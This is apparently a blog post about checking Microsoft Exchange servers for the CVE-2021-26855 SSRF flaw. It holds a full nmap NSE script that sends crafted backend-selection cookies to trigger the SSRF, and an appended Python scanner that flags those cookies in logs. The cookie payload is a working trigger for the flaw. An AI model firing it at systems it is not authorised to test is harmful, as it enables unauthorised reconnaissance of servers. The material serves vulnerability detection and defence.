CVE-2021-26855 Exchange SSRF: verification via DNSlog

Posted on 2021-3-14 18:00:57

[Screenshot: QQ截图20210314175829.png]

[Screenshot: QQ截图20210314175938.png]

Writing the POC is also easy: set up your own DNSlog platform and send random sequences with Python. An nmap test script is attached. Usage: nmap -p <port> --script http-vuln-cve2021-26855 <target>

[Screenshot: QQ截图20210314180010.png]

The platform does not support uploading .nse files, so the source is below:

[code="nse"]
description = [[
Detects whether the specified URL is vulnerable to the Exchange Server SSRF Vulnerability (CVE-2021-26855).
]]

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

---
-- @usage
-- nmap -p <port> --script http-vuln-cve2021-26855 <target>
--
-- @output
-- PORT    STATE SERVICE
-- 443/tcp  open  https
-- | http-vuln-cve2021-26855:
-- |   VULNERABLE
-- |   Exchange Server SSRF Vulnerability
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2021-26855
-- |
-- |     Disclosure date: 2021-03-08
-- |     References:
-- |       http://aka.ms/exchangevulns
--
-- @args http-vuln-cve2021-26855.method The HTTP method for the request. The default method is "GET".

author = "Microsoft"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }

portrule = shortport.http

action = function(host, port)
  local vuln = {
    title = "Exchange Server SSRF Vulnerability",
    state = vulns.STATE.NOT_VULN,
    description = [[
Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.
    ]],
    IDS = {
        CVE = "CVE-2021-26855"
    },
    references = {
        'http://aka.ms/exchangevulns'
    },
    dates = {
        disclosure = { year = '2021', month = '03', day = '08' }
    }
  }

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
  local path = "/owa/auth/x.js"

  -- Probe request: both backend-selection cookies point at localhost. A
  -- vulnerable front end honours them and reports the chosen backend in the
  -- X-CalculatedBETarget response header; a patched one ignores the cookies.
  local header = {
    ["Cookie"] = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
  }

  local response = http.generic_request(host, port, method, path, { header = header })

  -- Guard against a failed request (nil response or header table) before
  -- reading the header; string.match on a nil target would raise an error.
  local target = response and response.header and response.header['x-calculatedbetarget']

  if response and response.status == 500 and target and string.match(target, 'localhost') then
    vuln.state = vulns.STATE.VULN
  end

  return vuln_report:make_output(vuln)
end
[/code]
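As an added defender-side example (not part of the original post or of the script above), the following Python scanner flags requests that carry the X-AnonResource-Backend or X-BEResource cookies the script's description names as the SSRF vector, and marks those answered with the 500 status the script treats as the vulnerable signature. The "METHOD PATH STATUS COOKIE-HEADER" line format and the sample lines are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# The two backend-selection cookies the NSE script's description names as the
# SSRF vector. A benign OWA client never sends them.
SSRF_COOKIES = ("X-AnonResource-Backend", "X-BEResource")

# Hypothetical log format "METHOD PATH STATUS COOKIE-HEADER", constructed for
# this example; map real IIS/HttpProxy log fields onto it before reuse.
LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) (?P<cookie>.*)$")
COOKIE_RE = re.compile(r"(?P<name>[^=;\s]+)=(?P<value>[^;]*)")

# Constructed sample lines: line 2 mirrors the script's probe (500 response),
# line 4 is the same cookie against a host that rejected it.
SAMPLE_LOG = """\
GET /owa/auth/logon.aspx 200 -
GET /owa/auth/x.js 500 X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
GET /ecp/default.aspx 200 ASP.NET_SessionId=abc123
GET /owa/auth/y.js 401 X-AnonResource=true; X-BEResource=localhost/owa/auth/logon.aspx?~3;
"""

@dataclass
class Finding:
    path: str
    status: int
    cookie: str       # which SSRF cookie was present
    backend: str      # the backend the request tried to select
    probe_like: bool  # True when the 500 status matches the script's check

def parse_cookies(header: str) -> Dict[str, str]:
    """Split a Cookie header into a name -> value dict (empty for '-')."""
    return {m["name"]: m["value"].strip() for m in COOKIE_RE.finditer(header)}

def scan_log(text: str) -> List[Finding]:
    """Return one Finding per SSRF cookie seen on any request line."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        cookies = parse_cookies(m["cookie"])
        status = int(m["status"])
        for name in SSRF_COOKIES:
            if name in cookies:
                findings.append(Finding(m["path"], status, name, cookies[name], status == 500))
    return findings
```

Any hit is worth triage regardless of status: a 401 or 404 shows the cookie was sent and rejected, while a 500 on the same path matches the probe signature the script checks for.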